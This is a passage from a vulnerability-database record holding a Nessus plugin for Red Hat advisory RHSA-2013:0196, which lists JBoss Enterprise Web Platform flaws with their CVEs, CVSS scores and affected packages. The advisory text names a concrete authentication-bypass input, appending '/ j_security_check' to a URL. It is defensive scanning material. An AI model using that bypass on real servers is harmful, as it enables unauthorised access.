j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker to hijack the authenticated JMX Console session of an administrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against victims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if no security context was provided. Depending on the deployed applications, this could possibly allow a remote attacker to hijack the credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific roles did not actually restrict access, allowing remote attackers with valid JMX Invoker credentials to perform JMX operations accessible to roles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text when an exception was thrown. This could lead to the exposure of authentication credentials if local users had permissions to read the log file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow unauthenticated access by default in some profiles. The security interceptor's second layer of authentication prevented direct exploitation of this flaw. If the interceptor was misconfigured or inadvertently disabled, this flaw could lead to arbitrary code execution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a JGroups channel was started, allowing attackers on the adjacent network to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a null password was provided. In non-default configurations this could possibly lead to a remote attacker hijacking a previously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for reporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by Red Hat.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 5 : JBoss EWP (RHSA-2013:0196)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:aopalliance", "p-cpe:/a:redhat:enterprise_linux:apache-cxf", "p-cpe:/a:redhat:enterprise_linux:bsh2", "p-cpe:/a:redhat:enterprise_linux:bsh2-bsf", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb", "p-cpe:/a:redhat:enterprise_linux:google-guice", "p-cpe:/a:redhat:enterprise_linux:hibernate3", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc", "p-cpe:/a:redhat:enterprise_linux:jacorb-jboss", "p-cpe:/a:redhat:enterprise_linux:javassist", "p-cpe:/a:redhat:enterprise_linux:jboss-aop2", "p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-core", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo", "p-cpe:/a:redhat:enterprise_linux:jboss-cl", "p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api", "p-cpe:/a:redhat:enterprise_linux:jboss-common-beans", "p-cpe:/a:redhat:enterprise_linux:jboss-common-core", "p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms", "p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec", "p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers", "p-cpe:/a:redhat:enterprise_linux:jboss-logmanager", "p-cpe:/a:redhat:enterprise_linux:jboss-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-reflect", "p-cpe:/a:redhat:enterprise_linux:jboss-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime", "p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", "p-cpe:/a:redhat:enterprise_linux:jboss-security-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-vfs2", "p-cpe:/a:redhat:enterprise_linux:jbossas-web", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-client", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-tp-licenses", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-ws-native", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf-ewp", "p-cpe:/a:redhat:enterprise_linux:jbosssx2", "p-cpe:/a:redhat:enterprise_linux:jbossts", "p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-lib", "p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api", "p-cpe:/a:redhat:enterprise_linux:jbossws", "p-cpe:/a:redhat:enterprise_linux:jbossws-common", "p-cpe:/a:redhat:enterprise_linux:jbossws-framework", "p-cpe:/a:redhat:enterprise_linux:jbossws-spi", "p-cpe:/a:redhat:enterprise_linux:jgroups", "p-cpe:/a:redhat:enterprise_linux:jopr-embedded", "p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6", "p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts", "p-cpe:/a:redhat:enterprise_linux:resteasy", "p-cpe:/a:redhat:enterprise_linux:resteasy-examples", "p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc", "p-cpe:/a:redhat:enterprise_linux:resteasy-manual", "p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs", "p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs-examples", "p-cpe:/a:redhat:enterprise_linux:rhq", "p-cpe:/a:redhat:enterprise_linux:rhq-common-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-domain", "p-cpe:/a:redhat:enterprise_linux:rhq-core-gui", "p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system", "p-cpe:/a:redhat:enterprise_linux:rhq-core-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container", "p-cpe:/a:redhat:enterprise_linux:rhq-core-util", "p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common", "p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent", "p-cpe:/a:redhat:enterprise_linux:spring2", "p-cpe:/a:redhat:enterprise_linux:spring2-agent", "p-cpe:/a:redhat:enterprise_linux:spring2-all", "p-cpe:/a:redhat:enterprise_linux:spring2-aop", "p-cpe:/a:redhat:enterprise_linux:spring2-beans", "p-cpe:/a:redhat:enterprise_linux:spring2-context", "p-cpe:/a:redhat:enterprise_linux:spring2-core", "p-cpe:/a:redhat:enterprise_linux:wss4j", "p-cpe:/a:redhat:enterprise_linux:xerces-j2", "p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts", "p-cpe:/a:redhat:enterprise_linux:xml-commons", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which11", "p-cpe:/a:redhat:enterprise_linux:xml-security", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2013-0196.NASL", "href": "https://www.tenable.com/plugins/nessus/78946", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0196. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78946);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5066\", \"CVE-2011-1096\", \"CVE-2011-2487\", \"CVE-2011-2730\", \"CVE-2011-2908\", \"CVE-2011-4575\", \"CVE-2012-0034\", \"CVE-2012-0874\", \"CVE-2012-2377\", \"CVE-2012-2379\", \"CVE-2012-3369\", \"CVE-2012-3370\", \"CVE-2012-3546\", \"CVE-2012-5478\");\n script_xref(name:\"RHSA\", value:\"2013:0196\");\n\n script_name(english:\"RHEL 5 : JBoss EWP (RHSA-2013:0196)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple\nsecurity issues, various bugs, and add several enhancements are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Web Platform 5.2.0 release serves as a\nreplacement for JBoss Enterprise Web Platform 5.1.2, and includes bug\nfixes and enhancements. As JBoss Enterprise Web Platform is a subset\nof JBoss Enterprise Application Platform, refer to the JBoss\nEnterprise Application Platform 5.2.0 Release Notes for information on\nthe most significant of these changes. The Release Notes will be\navailable shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain\ntext of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing\nsymmetric keys (for XML encryption), allowing a remote attacker to\nrecover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary\ncode in the context of the application server, or to obtain sensitive\ninformation from the server. Manual action is required to apply this\nfix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by\na Supporting Token, but not whether the correct token was used. A\nremote attacker could transmit confidential information without the\nappropriate security, and potentially circumvent access controls on\nweb services exposed via Apache CXF. Refer to the Solution section for\ndetails. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another\ncomponent that calls request.setUserPrincipal() before the call to\nFormAuthenticator# authenticate() (such as the Single-Sign-On valve),\nit was possible to bypass the security constraint checks in the FORM\nauthenticator by appending '/ j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote\nattacker to hijack the authenticated JMX Console session of an\nadministrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential\nif no security context was provided. Depending on the deployed\napplications, this could possibly allow a remote attacker to hijack\nthe credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing\nlocal users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain\ntext when an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the\nlog file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct\nexploitation of this flaw. If the interceptor was misconfigured or\ninadvertently disabled, this flaw could lead to arbitrary code\nexecution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication\nwhen a JGroups channel was started, allowing attackers on the adjacent\nnetwork to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call\nif a null password was provided. In non-default configurations this\ncould possibly lead to a remote attacker hijacking a\npreviously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum\nfor reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project\nfor reporting CVE-2012-2379; and Tyler Krpata for reporting\nCVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by\nCarlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of\nRed Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and\nCVE-2012-2377 was discovered by Red Hat.\"\n );\n # https://access.redhat.com/knowledge/docs/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-us/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0196\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3546\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-5478\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0874\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:aopalliance\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2-bsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:google-guice\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jacorb-jboss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-aop2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-reflect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-vfs2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-tp-licenses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-ws-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf-ewp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbosssx2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-framework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jgroups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-examples\");\n script_set_attribute(attribute:\"cpe\", 